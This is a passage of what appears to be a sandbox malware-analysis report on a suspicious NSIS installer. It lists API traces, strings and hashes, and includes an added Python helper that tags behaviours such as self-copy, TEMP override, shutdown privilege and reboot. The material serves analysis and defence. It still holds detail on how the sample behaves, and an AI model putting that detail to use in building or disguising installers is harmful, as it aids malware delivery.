                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                • String ID: {
                                                                                • API String ID: 590372296-366298937
                                                                                • Opcode ID: 37368ef33480fb737561e727008f589c68c636835f40b94f7f78e68fc6a36340
                                                                                • Instruction ID: 691c8e7aa241a152ccc1fa1da29986a8db7386483fecbbc97dabe6f77f48909a
                                                                                • Opcode Fuzzy Hash: 37368ef33480fb737561e727008f589c68c636835f40b94f7f78e68fc6a36340
                                                                                • Instruction Fuzzy Hash: D4B14971800608BFDB119FA0DD89EAE7B79FB48355F00803AFA41BA1A0CB755E51DF68
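The two API lists above (the 004032A0 entry routine and the 004052EE install-page procedure) are the kind of trace an analyst wants to triage mechanically: which calls are the NSIS stub's stock behaviour, and which ones (TEMP/TMP override, self-copy, SeShutdownPrivilege, reboot, clipboard write) deserve a look at the call site. The helper below is an added example, not code from the Joe Sandbox report or from NSIS. Its sample lines are copied from those two records in the report's own "• api.MODULE(args), ref: address" form; the behaviour tags, the %LOCALAPPDATA%/%USERPROFILE% rewriting and the sandbox user name "user" are the example's own assumptions.

```python
"""Triage helper for Joe Sandbox "APIs" trace lines (added example, not report code)."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample: lines copied from the 004032A0 and 004052EE records,
# in the report's own "• api.MODULE(args), ref: address" form.
SAMPLE_TRACE = r"""
• SetErrorMode.KERNELBASE ref: 004032C3
• #17.COMCTL32(00000007,00000009), ref: 00403315
• OleInitialize.OLE32(00000000), ref: 0040331C
• SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040350B
• SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403513
  • Part of subcall function 00406050: lstrcpynW.KERNEL32(?,?,00000400,0040334D,Serrasalmo Setup,NSIS Error), ref: 0040605D
• CopyFileW.KERNEL32(C:\Users\user\Desktop\WtZl31OLfA.exe,0042AA08,00000001), ref: 004036D6
• LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040374E
• ExitWindowsEx.USER32(00000002,80040002), ref: 00403796
• SetClipboardData.USER32(0000000D,00000000), ref: 0040566B
"""

# Imports by ordinal appear as "#N"; comctl32 ordinal 17 is InitCommonControls,
# which every NSIS stub calls during start-up.
ORDINAL_NAMES = {("COMCTL32", "#17"): "InitCommonControls"}

EWX_REBOOT = 0x00000002          # ExitWindowsEx flag (winuser.h)
CF_UNICODETEXT = 0x0D            # clipboard format (winuser.h)
SHTDN_REASONS = {                # shutdown-reason bits (reason.h)
    0x80000000: "SHTDN_REASON_FLAG_PLANNED",
    0x00040000: "SHTDN_REASON_MAJOR_APPLICATION",
    0x00000002: "SHTDN_REASON_MINOR_INSTALLATION",
}

LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>#?\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: str                       # code address of the call site
    subcall: Optional[str] = None  # set for "Part of subcall function" lines

    @property
    def name(self) -> str:
        """Import name with ordinal imports resolved."""
        return ORDINAL_NAMES.get((self.module, self.api), self.api)


def parse_trace(text: str) -> List[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # blank lines and headings
        args = m.group("args")
        calls.append(ApiCall(m.group("api"), m.group("mod"),
                             args.split(",") if args else [],
                             m.group("ref"), m.group("sub")))
    return calls


def normalize_path(arg: str, user: str = "user") -> str:
    """Rewrite sandbox-specific paths so indicators carry across runs.
    The sandbox user name ("user" in this report) is an assumption."""
    base = r"(?i)^C:\\Users\\" + re.escape(user)
    p = re.sub(base + r"\\AppData\\Local", "%LOCALAPPDATA%", arg)
    return re.sub(base, "%USERPROFILE%", p)


def decode_shutdown_reason(reason: int) -> List[str]:
    return [name for bit, name in SHTDN_REASONS.items() if reason & bit]


def looks_like_nsis_stub(calls: List[ApiCall]) -> bool:
    """Start-up fingerprint of the NSIS stub: InitCommonControls and
    OleInitialize plus the hard-coded "NSIS Error" caption in a string copy."""
    names = {c.name for c in calls}
    strings = {s for c in calls for s in c.args}
    return {"InitCommonControls", "OleInitialize"} <= names and "NSIS Error" in strings


def find_behaviours(calls: List[ApiCall], sample_path: str) -> Dict[str, List[str]]:
    """Map a behaviour tag to the call-site addresses where it occurs."""
    hits: Dict[str, List[str]] = {}

    def tag(key: str, ref: str) -> None:
        hits.setdefault(key, []).append(ref)

    for c in calls:
        a = c.args
        if c.name == "SetEnvironmentVariableW" and a and a[0] in ("TEMP", "TMP"):
            tag("temp_override", c.ref)    # child processes inherit the chosen dir
        elif c.name == "CopyFileW" and a and normalize_path(a[0]) == normalize_path(sample_path):
            tag("self_copy", c.ref)        # the stub copies its own image
        elif c.name == "LookupPrivilegeValueW" and "SeShutdownPrivilege" in a:
            tag("shutdown_privilege", c.ref)
        elif c.name == "ExitWindowsEx" and a and int(a[0], 16) & EWX_REBOOT:
            tag("reboot", c.ref)
        elif c.name == "SetClipboardData" and a and int(a[0], 16) == CF_UNICODETEXT:
            tag("clipboard_write", c.ref)  # writes text; it never reads the clipboard
    return hits


if __name__ == "__main__":
    for key, refs in find_behaviours(parse_trace(SAMPLE_TRACE), r"C:\Users\user\Desktop\WtZl31OLfA.exe").items():
        print(key, refs)
```

Running it on the sample tags the two SetEnvironmentVariableW sites as temp_override, the CopyFileW at 004036D6 as self_copy, the privilege and reboot sites at 0040374E and 00403796, and the SetClipboardData at 0040566B as clipboard_write, while looks_like_nsis_stub returns True. The point of the tags is triage order, not verdict: every one of these calls exists in a clean NSIS stub, so the analyst's attention goes to what the installer script does with them (here, the strings naming C:\Users\user\AppData\Local\neoimpressionism\Vekselformular), not to the stub code itself.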

                                                                                Control-flow Graph
                                                                                Function 00406072: the NSIS stub's string-expansion routine (GetNSISString), which resolves installer variables on demand: $SYSDIR via GetSystemDirectoryW, $WINDIR via GetWindowsDirectoryW, shell folders via SHGetSpecialFolderLocation/SHGetPathFromIDListW (freeing the PIDL with CoTaskMemFree), and $QUICKLAUNCH by appending "\Microsoft\Internet Explorer\Quick Launch". The rendered graph and its edge list are omitted; the APIs reached are listed below.
                                                                                APIs
                                                                                • GetVersion.KERNEL32(00000000,Completed,?,004051E6,Completed,00000000,00000000,0041C400), ref: 00406135
                                                                                • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 004061B3
                                                                                • GetWindowsDirectoryW.KERNEL32(: Completed,00000400), ref: 004061C6
                                                                                • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00406202
                                                                                • SHGetPathFromIDListW.SHELL32(?,: Completed), ref: 00406210
                                                                                • CoTaskMemFree.OLE32(?), ref: 0040621B
                                                                                • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 0040623F
                                                                                • lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004051E6,Completed,00000000,00000000,0041C400), ref: 00406299
                                                                                 Memory Dump Source
                                                                                 • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                • String ID: : Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                • API String ID: 900638850-905382516
                                                                                • Opcode ID: 77a03850bddf5695e6b0b32a6855accced49c5eafe9b7dc377c0e735c0fbd350
                                                                                • Instruction ID: 6a0e75f8176bdfaa808a817e977aa907b1c5d4b6119349843486ba00336cef2a
                                                                                • Opcode Fuzzy Hash: 77a03850bddf5695e6b0b32a6855accced49c5eafe9b7dc377c0e735c0fbd350
                                                                                • Instruction Fuzzy Hash: 45611E71A00105ABDF20AF65CC41AEE37A5EF45314F12817FE852BA2D0D73D8AA1CB4D

                                                                                 Control-flow Graph
                                                                                APIs
                                                                                • DeleteFileW.KERNELBASE(?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040586A
                                                                                • lstrcatW.KERNEL32(0042F250,\*.*,0042F250,?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058B2
                                                                                • lstrcatW.KERNEL32(?,0040A014,?,0042F250,?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058D5
                                                                                • lstrlenW.KERNEL32(?,?,0040A014,?,0042F250,?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058DB
                                                                                • FindFirstFileW.KERNEL32(0042F250,?,?,?,0040A014,?,0042F250,?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058EB
                                                                                • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 0040598B
                                                                                • FindClose.KERNEL32(00000000), ref: 0040599A
                                                                                Strings
                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 0040584E
                                                                                • \*.*, xrefs: 004058AC
                                                                                • "C:\Users\user\Desktop\WtZl31OLfA.exe", xrefs: 00405841
                                                                                Similarity
                                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                • String ID: "C:\Users\user\Desktop\WtZl31OLfA.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                • API String ID: 2035342205-3831545218
                                                                                • Opcode ID: 310f22d1e18abc7c3bbe2dee3bc3119d14cc0d79031cc9c47b9afefb4b25f888
                                                                                • Instruction ID: caf420165dc21d0a99f0983ed575dd8be70d76c6b9b5ff92ec706b465e099e4b
                                                                                • Opcode Fuzzy Hash: 310f22d1e18abc7c3bbe2dee3bc3119d14cc0d79031cc9c47b9afefb4b25f888
                                                                                • Instruction Fuzzy Hash: DB41B171800A14EADB21AB65CD49BBF7678EF85764F10423BF801B11D1D77C4A82DE6E
                                                                                APIs
                                                                                • FindFirstFileW.KERNELBASE(75923420,00430298,0042FA50,00405B55,0042FA50,0042FA50,00000000,0042FA50,0042FA50,75923420,?,C:\Users\user\AppData\Local\Temp\,00405861,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 0040639E
                                                                                • FindClose.KERNEL32(00000000), ref: 004063AA
                                                                                Similarity
                                                                                • API ID: Find$CloseFileFirst
                                                                                • String ID:
                                                                                • API String ID: 2295610775-0
                                                                                • Opcode ID: 395586dc4edb235965e2a282b5d7432a8e50c5a064bd8b1b9b8a05e290e3bc0b
                                                                                • Instruction ID: 351587cf9ce3a522800e1c73501a9738d9f8821b35168cd3fdb078f4a7df3edc
                                                                                • Opcode Fuzzy Hash: 395586dc4edb235965e2a282b5d7432a8e50c5a064bd8b1b9b8a05e290e3bc0b
                                                                                • Instruction Fuzzy Hash: C2D012315081209BC34157787E0C84B7B5C9F1A3317259F36F96AF12E1CB348C2286DC
                                                                                APIs
                                                                                • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040280A
                                                                                Similarity
                                                                                • API ID: FileFindFirst
                                                                                • String ID:
                                                                                • API String ID: 1974802433-0
                                                                                • Opcode ID: a81ee3202ab0ebdc7edd9b8add70fe35bba4a5d97339da7cd4a9b36177af59e9
                                                                                • Instruction ID: 34d4ac1ca0ba7345d9811ef03afe410f99a72e11e7e6ea98f315d3ade0c6d005
                                                                                • Opcode Fuzzy Hash: a81ee3202ab0ebdc7edd9b8add70fe35bba4a5d97339da7cd4a9b36177af59e9
                                                                                • Instruction Fuzzy Hash: 32F08C71A012149BDB01EBA4DE49AAEB378FF45324F20457BE105F21E1E7B89A409B29

                                                                                 Control-flow Graph
                                                                                APIs
                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C78
                                                                                • ShowWindow.USER32(?), ref: 00403C95
                                                                                • DestroyWindow.USER32 ref: 00403CA9
                                                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CC5
                                                                                • GetDlgItem.USER32(?,?), ref: 00403CE6
                                                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CFA
                                                                                • IsWindowEnabled.USER32(00000000), ref: 00403D01
                                                                                • GetDlgItem.USER32(?,00000001), ref: 00403DAF
                                                                                • GetDlgItem.USER32(?,00000002), ref: 00403DB9
                                                                                • SetClassLongW.USER32(?,000000F2,?), ref: 00403DD3
                                                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E24
                                                                                • GetDlgItem.USER32(?,00000003), ref: 00403ECA
                                                                                • ShowWindow.USER32(00000000,?), ref: 00403EEB
                                                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403EFD
                                                                                • EnableWindow.USER32(?,?), ref: 00403F18
                                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F2E
                                                                                • EnableMenuItem.USER32(00000000), ref: 00403F35
                                                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F4D
                                                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F60
                                                                                • lstrlenW.KERNEL32(0042D248,?,0042D248,Serrasalmo Setup), ref: 00403F89
                                                                                • SetWindowTextW.USER32(?,0042D248), ref: 00403F9D
                                                                                • ShowWindow.USER32(?,0000000A), ref: 004040D1
                                                                                Similarity
                                                                                • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                • String ID: Serrasalmo Setup
                                                                                • API String ID: 3282139019-3997006238
                                                                                • Opcode ID: 4b72a46082cfccb0225a7e19ce14cf06edf6b5bf773da4775a24074ada9f3e72
                                                                                • Instruction ID: 977002fee4e807fcea2a4689fe207fdbad8331f3a024ab3ce592dbd86d7f0908
                                                                                • Opcode Fuzzy Hash: 4b72a46082cfccb0225a7e19ce14cf06edf6b5bf773da4775a24074ada9f3e72
                                                                                • Instruction Fuzzy Hash: 2EC1D171504204BFDB216F61EE89E2B3A69FB88706F04053EF641B21F0CB799991DB6D

                                                                                 Control-flow Graph
                                                                                APIs
                                                                                  • Part of subcall function 0040642A: GetModuleHandleA.KERNEL32(?,00000020,?,00403309,00000009), ref: 0040643C
                                                                                  • Part of subcall function 0040642A: GetProcAddress.KERNEL32(00000000,?), ref: 00406457
                                                                                • lstrcatW.KERNEL32(1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\WtZl31OLfA.exe",00000000), ref: 0040391A
                                                                                • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\neoimpressionism,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,75923420), ref: 0040399A
                                                                                • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\neoimpressionism,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000), ref: 004039AD
                                                                                • GetFileAttributesW.KERNEL32(: Completed), ref: 004039B8
                                                                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\neoimpressionism), ref: 00403A01
                                                                                  • Part of subcall function 00405F97: wsprintfW.USER32 ref: 00405FA4
                                                                                • RegisterClassW.USER32(00433E80), ref: 00403A3E
                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A56
                                                                                • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A8B
                                                                                • ShowWindow.USER32(00000005,00000000), ref: 00403AC1
                                                                                • GetClassInfoW.USER32(00000000,RichEdit20W,00433E80), ref: 00403AED
                                                                                • GetClassInfoW.USER32(00000000,RichEdit,00433E80), ref: 00403AFA
                                                                                • RegisterClassW.USER32(00433E80), ref: 00403B03
                                                                                • DialogBoxParamW.USER32(?,00000000,00403C3C,00000000), ref: 00403B22
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                • String ID: "C:\Users\user\Desktop\WtZl31OLfA.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\neoimpressionism$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb

                                                                                 Control-flow Graph
                                                                                 • Graph of the function starting at 00402DEE (block-level graph rendering and executed/not-executed legend not reproduced)
                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 00402DFF
                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\WtZl31OLfA.exe,00000400,?,?,"C:\Users\user\Desktop\WtZl31OLfA.exe",00403536,?), ref: 00402E1B
                                                                                  • Part of subcall function 00405C25: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\WtZl31OLfA.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\WtZl31OLfA.exe",00403536,?), ref: 00405C29
                                                                                  • Part of subcall function 00405C25: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\WtZl31OLfA.exe",00403536,?), ref: 00405C4B
                                                                                • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\WtZl31OLfA.exe,C:\Users\user\Desktop\WtZl31OLfA.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\WtZl31OLfA.exe",00403536,?), ref: 00402E67
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                • String ID: "C:\Users\user\Desktop\WtZl31OLfA.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\WtZl31OLfA.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft

                                                                                 Control-flow Graph
                                                                                 • Graph of the function starting at 00401767 (block-level graph rendering and executed/not-executed legend not reproduced)
                                                                                APIs
                                                                                • lstrcatW.KERNEL32(00000000,00000000,ExecToStack,C:\Users\user\AppData\Local\neoimpressionism\Vekselformular,?,?,00000031), ref: 004017A8
                                                                                • CompareFileTime.KERNEL32(-00000014,?,ExecToStack,ExecToStack,00000000,00000000,ExecToStack,C:\Users\user\AppData\Local\neoimpressionism\Vekselformular,?,?,00000031), ref: 004017CD
                                                                                  • Part of subcall function 00406050: lstrcpynW.KERNEL32(?,?,00000400,0040334D,Serrasalmo Setup,NSIS Error), ref: 0040605D
                                                                                  • Part of subcall function 004051AF: lstrlenW.KERNEL32(Completed,00000000,0041C400,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051E7
                                                                                  • Part of subcall function 004051AF: lstrlenW.KERNEL32(0040318B,Completed,00000000,0041C400,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051F7
                                                                                  • Part of subcall function 004051AF: lstrcatW.KERNEL32(Completed,0040318B,0040318B,Completed,00000000,0041C400,759223A0), ref: 0040520A
                                                                                  • Part of subcall function 004051AF: SetWindowTextW.USER32(Completed,Completed), ref: 0040521C
                                                                                  • Part of subcall function 004051AF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405242
                                                                                  • Part of subcall function 004051AF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040525C
                                                                                  • Part of subcall function 004051AF: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526A
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nsi94BB.tmp\nsExec.dll$C:\Users\user\AppData\Local\neoimpressionism\Vekselformular$ExecToStack

                                                                                 Control-flow Graph
                                                                                 • Graph of the function starting at 004051AF (block-level graph rendering and executed/not-executed legend not reproduced)
                                                                                APIs
                                                                                • lstrlenW.KERNEL32(Completed,00000000,0041C400,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051E7
                                                                                • lstrlenW.KERNEL32(0040318B,Completed,00000000,0041C400,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051F7
                                                                                • lstrcatW.KERNEL32(Completed,0040318B,0040318B,Completed,00000000,0041C400,759223A0), ref: 0040520A
                                                                                • SetWindowTextW.USER32(Completed,Completed), ref: 0040521C
                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405242
                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040525C
                                                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526A
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                • String ID: Completed

                                                                                 Control-flow Graph
                                                                                 • Graph of the function starting at 00403027 (block-level graph rendering and executed/not-executed legend not reproduced)
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: CountTick$wsprintf
                                                                                • String ID: ... %d%%$@
                                                                                • API String ID: 551687249-3859443358
                                                                                • Opcode ID: c7497415bb8dac91a47c0922d01840e0ec24c5b3dd3d0398628956ac72cbd470
                                                                                • Instruction ID: a151fef9e86e41fc3429002d146a23742bf049d8b35666da4da471479faf367b
                                                                                • Opcode Fuzzy Hash: c7497415bb8dac91a47c0922d01840e0ec24c5b3dd3d0398628956ac72cbd470
                                                                                • Instruction Fuzzy Hash: F9517C71901219EBDB10CF65DA44BAE3BA8AF05766F10417BF815B72C0C7789A41CBAA

                                                                                 Control-flow Graph (legend: Executed / Not Executed)
                                                                                 control_flow_graph 697 40567e-4056c9 CreateDirectoryW 698 4056cb-4056cd 697->698 699 4056cf-4056dc GetLastError 697->699 700 4056f6-4056f8 698->700 699->700 701 4056de-4056f2 SetFileSecurityW 699->701 701->698 702 4056f4 GetLastError 701->702 702->700
                                                                                APIs
                                                                                • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004056C1
                                                                                • GetLastError.KERNEL32 ref: 004056D5
                                                                                • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056EA
                                                                                • GetLastError.KERNEL32 ref: 004056F4
                                                                                Strings
                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 004056A4
                                                                                • C:\Users\user\Desktop, xrefs: 0040567E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                                                • API String ID: 3449924974-1521822154
                                                                                • Opcode ID: 00ef7c6a0f32c1044080c086edeac3c819c61aa9b54d8d974478d91d60ac005e
                                                                                • Instruction ID: dfae01ed47dc7750d2476d71b6e364c3d252909874df994a371284b211a748b1
                                                                                • Opcode Fuzzy Hash: 00ef7c6a0f32c1044080c086edeac3c819c61aa9b54d8d974478d91d60ac005e
                                                                                • Instruction Fuzzy Hash: 18011A71D10619DADF009FA0CA447EFBFB8EF14304F00443AD549B6190E7799608CFA9

                                                                                 Control-flow Graph (legend: Executed / Not Executed)
                                                                                 control_flow_graph 703 4063ba-4063da GetSystemDirectoryW 704 4063dc 703->704 705 4063de-4063e0 703->705 704->705 706 4063f1-4063f3 705->706 707 4063e2-4063eb 705->707 709 4063f4-406427 wsprintfW LoadLibraryExW 706->709 707->706 708 4063ed-4063ef 707->708 708->709
                                                                                APIs
                                                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D1
                                                                                • wsprintfW.USER32 ref: 0040640C
                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406420
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                • String ID: %s%S.dll$UXTHEME$\
                                                                                • API String ID: 2200240437-1946221925
                                                                                • Opcode ID: 9cd176900e46196ffcfca9c6351026e8055dbc09b9427d0f5483d49a535bfda6
                                                                                • Instruction ID: 7b807a610878b0bc4ee9c08e82fc2c2c0a074289e2a27b7b834fb84ffe8ff7bb
                                                                                • Opcode Fuzzy Hash: 9cd176900e46196ffcfca9c6351026e8055dbc09b9427d0f5483d49a535bfda6
                                                                                • Instruction Fuzzy Hash: 09F0F670500219A7DB10AB68ED0DF9B3A6CEB00304F50443AA946F10D1EBB8DA29CBE8

                                                                                 Control-flow Graph (legend: Executed / Not Executed)
                                                                                 control_flow_graph 710 405c54-405c60 711 405c61-405c95 GetTickCount GetTempFileNameW 710->711 712 405ca4-405ca6 711->712 713 405c97-405c99 711->713 715 405c9e-405ca1 712->715 713->711 714 405c9b 713->714 714->715
                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 00405C72
                                                                                • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\WtZl31OLfA.exe",0040329E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00405C8D
                                                                                Strings
